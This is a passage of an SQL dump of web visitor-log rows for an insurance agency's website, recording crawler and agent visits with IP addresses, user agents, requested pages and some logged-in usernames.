+http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(1448,'0b_15193ef7cdc926ef12c675930ba732c3','1457290748','54.91.16.247','ec2-54-91-16-247.compute-1.amazonaws.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko)(compatible; http://url-validation.citygrid.com/) Chrome/23.0.1271.95 Safari/537.11','','',0,'MacOSX','Google Chrome','','','','Unknown Spider','','','','0','0',0),(1450,'0b_61d0daca2ea6231f1d16662275b72ef4','1457293116','66.249.73.187','crawl-66-249-73-187.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(1453,'0b_818cb1be61f6853ccdd9f1c98b0b962a','1457294758','157.55.39.227','msnbot-157-55-39-227.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1456,'0b_2d9379c3b1bd3829daded0ef5c8adfa6','1457294912','123.125.71.38','baiduspider-123-125-71-38.crawl.baidu.com','/robots.txt','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(1459,'0b_448c6a492568aa8cce09c7dc34102101','1457296753','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(1460,'0b_448c6a492568aa8cce09c7dc34102101','1457296755','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(1463,'0b_4849cfede12cd13dbd6022456d83c8f2','1457300749','75.99.148.62','ool-4b63943e.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1280 x 1024','','','','','','0','0',0),(1466,'0b_4849cfede12cd13dbd6022456d83c8f2','1457300749','75.99.148.62','ool-4b63943e.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1280 x 1024','','','','','','0','0',0),(1468,'0b_4849cfede12cd13dbd6022456d83c8f2','1457300751','75.99.148.62','ool-4b63943e.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1280 x 1024','','','','','','0','0',0),(1469,'0b_4849cfede12cd13dbd6022456d83c8f2','1457300754','75.99.148.62','ool-4b63943e.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1280 x 1024','','','','','','0','0',0),(1471,'0b_4849cfede12cd13dbd6022456d83c8f2','1457300770','75.99.148.62','ool-4b63943e.static.optonline.net','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1280 x 1024','','','','joel10950','','0','51',0),(1472,'0b_82d20b7fba0de93dc96474da0b244b10','1457302365','66.249.73.187','crawl-66-249-73-187.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(1475,'0b_9eb8b4cb984a8cd80c1b55f6926f2e59','1457302450','180.76.15.147','baiduspider-180-76-15-147.crawl.baidu.com','/register/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(1478,'0b_1166171a5a5dd4651f95f83721e64ebc','1457303917','54.91.16.247','ec2-54-91-16-247.compute-1.amazonaws.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko)(compatible; http://url-validation.citygrid.com/) Chrome/23.0.1271.95 Safari/537.11','','',0,'MacOSX','Google Chrome','','','','Unknown Spider','','','','0','0',0),(1481,'0b_b19092c18d846505824c1683f724e97f','1457304075','66.249.73.178','crawl-66-249-73-178.googlebot.com','/top.html','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(1484,'0b_6ce6b96bc9d61a8abc05b4f948e9e1fd','1457306494','157.55.39.227','msnbot-157-55-39-227.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1487,'0b_cc13318766c7e3add57dfa3699ab72c4','1457310022','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(1490,'0b_a0def1a09b17ae977c799c12036dba2a','1457311511','66.249.73.187','crawl-66-249-73-187.googlebot.com','/products.html','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(1493,'0b_2f9ef1b9a4493e86081e396335b85e79','1457315249','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win8','Google Chrome','us','1920 x 1080','','','','','','0','0',0),(1496,'0b_2f9ef1b9a4493e86081e396335b85e79','1457315251','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win8','Google Chrome','us','1920 x 1080','','','','','','0','0',0),(1498,'0b_2f9ef1b9a4493e86081e396335b85e79','1457315256','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win8','Google Chrome','us','1920 x 1080','','','','','','0','0',0),(1499,'0b_2f9ef1b9a4493e86081e396335b85e79','1457315372','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Google Chrome','us','1920 x 1080','','','','Sgrunstein','','0','51',0),(1501,'0b_046b6c032484c69531c173a55f09e24b','1457316131','66.249.73.169','crawl-66-249-73-169.googlebot.com','/contact/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(1504,'0b_046b6c032484c69531c173a55f09e24b','1457316179','66.249.73.169','crawl-66-249-73-169.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(1507,'0b_046b6c032484c69531c173a55f09e24b','1457316204','66.249.73.169','crawl-66-249-73-169.googlebot.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://www.empireins.com/','',0,'','','us','','','Googlebot','','','','0','0',0),(1508,'0b_046b6c032484c69531c173a55f09e24b','1457316223','66.249.73.169','crawl-66-249-73-169.googlebot.com','/discl.htm','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','us','','','Googlebot','','','','0','0',0),(1510,'0b_046b6c032484c69531c173a55f09e24b','1457316255','66.249.73.169','crawl-66-249-73-169.googlebot.com','/paramed.htm','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','us','','','Googlebot','','','','0','0',0),(1513,'0b_046b6c032484c69531c173a55f09e24b','1457316273','66.249.73.169','crawl-66-249-73-169.googlebot.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','us','','','Googlebot','','','','0','0',0),(1516,'0b_b78865d8de07747dee3197a6635c4393','1457316970','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(1517,'0b_cd064e744db476293c4feca8fd5d79f3','1457318182','40.77.167.18','msnbot-40-77-167-18.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1520,'0b_897b610dace1d73196961d4e7bdcce5c','1457318718','66.249.73.187','crawl-66-249-73-187.googlebot.com','/register/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(1523,'0b_1bb809084e5d4b547255627e3c43b6c2','1457320306','66.249.73.202','crawl-66-249-73-202.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(1525,'0b_f8c4e9982d7d0625e64e4d4c8cac509d','1457320853','157.55.39.227','msnbot-157-55-39-227.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1526,'0b_d650157112feac5fbdd4b68aba6e0e52','1457328929','40.77.167.45','msnbot-40-77-167-45.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1529,'0b_c5faf0fb6a4aa32aa326841301febdbc','1457329813','157.55.39.37','msnbot-157-55-39-37.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1532,'0b_04effea922f22466662e94c561a83992','1457330797','45.55.131.114','45.55.131.114','/js/varien/product.js','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','','','','','','','','3','0',0),(1534,'0b_5a330a0e9e1b17fc8798f461e2eec142','1457334367','38.125.10.133','38.125.10.133','/','Java/1.7.0_71','','',0,'','','','','','Java','','','','0','0',0),(1535,'0b_bae64781a7acf4e35995e09147792dc2','1457334435','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(1538,'0b_ad7584283f43ab3e1e7bbf6b89226c29','1457338397','157.55.39.227','msnbot-157-55-39-227.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1540,'0b_d34de627fdf6bc217163aa1d04db2c24','1457338432','40.77.167.45','msnbot-40-77-167-45.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1543,'0b_d34de627fdf6bc217163aa1d04db2c24','1457338488','40.77.167.18','msnbot-40-77-167-18.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1546,'0b_7dfead972a73bc628b4da92a129be0df','1457339963','180.76.15.156','baiduspider-180-76-15-156.crawl.baidu.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(1547,'0b_08ee4a40bfb454a31ce404124451769a','1457340947','157.55.39.37','msnbot-157-55-39-37.search.msn.com','/main.html','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(1549,'0b_0037e69dfdbf8bb5950203b180739adb','1457341729','208.115.111.66','208-115-111-66-reverse.wowrack.com','/case-status/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(1550,'0b_1c181c28c33501b6cf8db72d6b5ab414','1457344065','40.77.167.45','msnbot-40-77-167-45.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1552,'0b_7cbf431969522022724b3bed0c598452','1457345215','180.76.15.23','baiduspider-180-76-15-23.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(1553,'0b_0a6c4450668537850b13682917922684','1457345217','180.76.15.154','baiduspider-180-76-15-154.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(1556,'0b_4a9c054fc06b68617492db61d9e42312','1457347501','157.55.39.227','msnbot-157-55-39-227.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1559,'0b_9e82cc3e75fe58cbad0822894754b5dc','1457353939','66.249.75.95','crawl-66-249-75-95.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(1561,'0b_9e82cc3e75fe58cbad0822894754b5dc','1457353951','66.249.75.95','crawl-66-249-75-95.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(1564,'0b_695c36a7dd835f15c52e9d5761b6b3a0','1457353951','66.249.75.103','crawl-66-249-75-103.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(1565,'0b_6b811c5d7a7031b33c86528fb249e32a','1457359968','66.249.83.213,24.186.240.34','ool-18baf022.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google Favicon','','',0,'Win7','Firefox 6','','','','','','','','0','0',0),(1567,'0b_54a7ee00600809d8ff38832c30bb4598','1457360033','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(1568,'0b_54a7ee00600809d8ff38832c30bb4598','1457360041','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(1571,'0b_d47f29e4f49ad339e94af3ddcc8e4bbe','1457360378','66.102.6.173,24.186.240.34','ool-18baf022.dyn.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview) Chrome/27.0.1453 Safari/537.36','http://www.google.com/search','',0,'Linux','Google Chrome','us','','','','','','','0','0',0),(1573,'0b_d47f29e4f49ad339e94af3ddcc8e4bbe','1457360381','66.102.6.173,24.186.240.34','ool-18baf022.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview) Chrome/27.0.1453 Safari/537.36','http://www.empireins.com/','',0,'Linux','Google Chrome','us','','','','','','','0','0',0),(1574,'0b_711eea0a3b6b96a7898b3bfbe36fe0a1','1457361545','86.106.18.242','242-ST-WIND-2','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.0; rv:15.0) Gecko/20121011 Firefox/15.0.2','','',0,'WinVista','Firefox 15','us','','','','','','','0','0',0),(1576,'0b_7b2bd3794bbca12821949a6ad54f860a','1457362061','157.55.39.227','msnbot-157-55-39-227.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1577,'0b_c5a9266ecf02fcd6a002a3e28bf4ab8d','1457362644','40.77.167.18','msnbot-40-77-167-18.search.msn.com','/about-us/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(1579,'0b_f18b8d5595fdf418e5c59f26b19a6f42','1457363490','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','','','','','roisy','','0','0',0),(1582,'0b_f18b8d5595fdf418e5c59f26b19a6f42','1457363492','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','','','','','roisy','','0','0',0),(1583,'0b_5213442c1a2e1e0228945246742f378b','1457364037','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(1585,'0b_5213442c1a2e1e0228945246742f378b','1457364041','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(1588,'0b_ad48a69910df1aa4ff0066c87d2d3823','1457364853','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(1589,'0b_7bbd4ddb374290614a985b858e49c043','1457364860','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1680 x 1050','','','','SimkowitzCo','','0','0',0),(1591,'0b_7bbd4ddb374290614a985b858e49c043','1457364876','75.99.37.250','ool-4b6325fa.static.optonline.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1680 x 1050','','','','SimkowitzCo','','0','51',0),(1592,'0b_7bbd4ddb374290614a985b858e49c043','1457364882','75.99.37.250','ool-4b6325fa.static.optonline.net','/life-product-search/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/carriers/','',0,'Win7 x64','IE 11','us','1680 x 1050','','','','SimkowitzCo','','0','51',0),(1594,'0b_b1aa12d900cc3af4f210184827cacf3b','1457365166','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(1595,'0b_b1aa12d900cc3af4f210184827cacf3b','1457365171','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(1598,'0b_b1aa12d900cc3af4f210184827cacf3b','1457365180','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(1601,'0b_b1aa12d900cc3af4f210184827cacf3b','1457365190','108.58.88.178','ool-6c3a58b2.static.optonline.net','/underwriting-cheat-sheets/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(1604,'0b_9786e86c14bc311c8c08fccb4d6818a6','1457365448','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(1606,'0b_9786e86c14bc311c8c08fccb4d6818a6','1457365449','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(1607,'0b_53db7aa9fd68151ba989039399331bc9','1457365578','66.249.75.89','crawl-66-249-75-89.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(1610,'0b_3467b90f0e2b78dafad036bfe5f0180f','1457366046','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(1612,'0b_3467b90f0e2b78dafad036bfe5f0180f','1457366046','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(1613,'0b_3467b90f0e2b78dafad036bfe5f0180f','1457366048','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(1615,'0b_3467b90f0e2b78dafad036bfe5f0180f','1457366054','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(1618,'0b_3467b90f0e2b78dafad036bfe5f0180f','1457366078','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','abrahammermelstein','','0','51',0),(1621,'0b_37cc9f403d7aeff393a1ab63b3e6222f','1457366519','69.175.67.58','newscan04.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(1624,'0b_37cc9f403d7aeff393a1ab63b3e6222f','1457366526','69.175.67.58','newscan04.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(1625,'0b_37cc9f403d7aeff393a1ab63b3e6222f','1457366529','69.175.67.58','newscan04.sitelock.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(1627,'0b_37cc9f403d7aeff393a1ab63b3e6222f','1457366531','69.175.67.58','newscan04.sitelock.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(1630,'0b_37cc9f403d7aeff393a1ab63b3e6222f','1457366536','69.175.67.58','newscan04.sitelock.com','/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(1633,'0b_37cc9f403d7aeff393a1ab63b3e6222f','1457366538','69.175.67.58','newscan04.sitelock.com','/licensing-contracting/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(1636,'0b_8c94198c12a58c6617cf989cc615f45c','1457366814','67.81.56.252','ool-435138fc.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(1637,'0b_8c94198c12a58c6617cf989cc615f45c','1457366817','67.81.56.252','ool-435138fc.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(1639,'0b_8c94198c12a58c6617cf989cc615f45c','1457366825','67.81.56.252','ool-435138fc.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(1640,'0b_8c94198c12a58c6617cf989cc615f45c','1457366845','67.81.56.252','ool-435138fc.dyn.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','zlberger','','0','51',0),(1643,'0b_3eeac8161c43489b6c6d9d1030b43d67','1457367977','50.108.150.57','50.108.150.57','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(1645,'0b_3eeac8161c43489b6c6d9d1030b43d67','1457367989','50.108.150.57','50.108.150.57','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(1646,'0b_3eeac8161c43489b6c6d9d1030b43d67','1457368002','50.108.150.57','50.108.150.57','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 